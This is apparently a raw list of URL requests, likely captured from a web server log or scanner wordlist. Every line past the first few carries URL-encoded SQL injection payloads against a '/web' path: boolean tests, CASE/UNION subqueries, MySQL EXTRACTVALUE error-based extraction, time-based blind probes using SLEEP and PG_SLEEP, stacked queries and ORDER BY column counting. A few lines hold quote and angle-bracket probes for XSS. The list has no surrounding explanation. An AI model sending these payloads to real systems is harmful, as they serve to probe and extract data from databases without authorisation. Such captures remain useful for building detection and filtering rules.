/web
/web/
/web
/web/
/web
/web
/web/
/web.%2C%2C%29%2C%2C%27%22..
/web%27tCiWtQ%3C%27%22%3EKWYqZq
/web%27tCiWtQ%3C%27%22%3EKWYqZq
/web%20AND%202361%3D6723
/web%20AND%206404%3D6404
/%28SELECT%20%28CASE%20WHEN%20%282301%3D9296%29%20THEN%20%27web%27%20ELSE%20%28SELECT%209296%20UNION%20SELECT%204642%29%20END%29%29
/%28SELECT%20%28CASE%20WHEN%20%282507%3D2507%29%20THEN%20%27web%27%20ELSE%20%28SELECT%207576%20UNION%20SELECT%204809%29%20END%29%29
/web%20AND%20EXTRACTVALUE%282720%2CCONCAT%280x5c%2C0x717a787171%2C%28SELECT%20%28ELT%282720%3D2720%2C1%29%29%29%2C0x717a626a71%29%29
/web%20AND%20EXTRACTVALUE%282720%2CCONCAT%280x5c%2C0x717a787171%2C%28SELECT%20%28ELT%282720%3D2720%2C1%29%29%29%2C0x717a626a71%29%29--%20ZNQJ
/web%29%3BSELECT%20PG_SLEEP%285%29--
/web%3BSELECT%20PG_SLEEP%285%29--
/web%27%29%3BSELECT%20PG_SLEEP%285%29--
/web%27%3BSELECT%20PG_SLEEP%285%29--
/web%27%3BSELECT%20PG_SLEEP%285%29--
/web%27%3BSELECT%20PG_SLEEP%285%29--
/web%20AND%20%28SELECT%205091%20FROM%20%28SELECT%28SLEEP%285%29%29%29hPlB%29
/web%20AND%20%28SELECT%205091%20FROM%20%28SELECT%28SLEEP%285%29%29%29hPlB%29
/web%20AND%20%28SELECT%205091%20FROM%20%28SELECT%28SLEEP%280%29%29%29hPlB%29
/web%20AND%20%28SELECT%205091%20FROM%20%28SELECT%28SLEEP%285%29%29%29hPlB%29
/web%20AND%20%28SELECT%205091%20FROM%20%28SELECT%28SLEEP%285%29%29%29hPlB%29--%20ejTC
/web%20AND%20%28SELECT%205091%20FROM%20%28SELECT%28SLEEP%285%29%29%29hPlB%29--%20ejTC
/web%20AND%207068%3D%28SELECT%207068%20FROM%20PG_SLEEP%285%29%29
/web%20AND%207068%3D%28SELECT%207068%20FROM%20PG_SLEEP%285%29%29--%20DQkT
/web%29%20ORDER%20BY%201--%20bUDA
/web%20ORDER%20BY%201--%20xuKN
/web%27%29%20ORDER%20BY%201--%20pIsO
/web%27%20ORDER%20BY%201--%20VOew
/web%20ORDER%20BY%201--%20RvMH
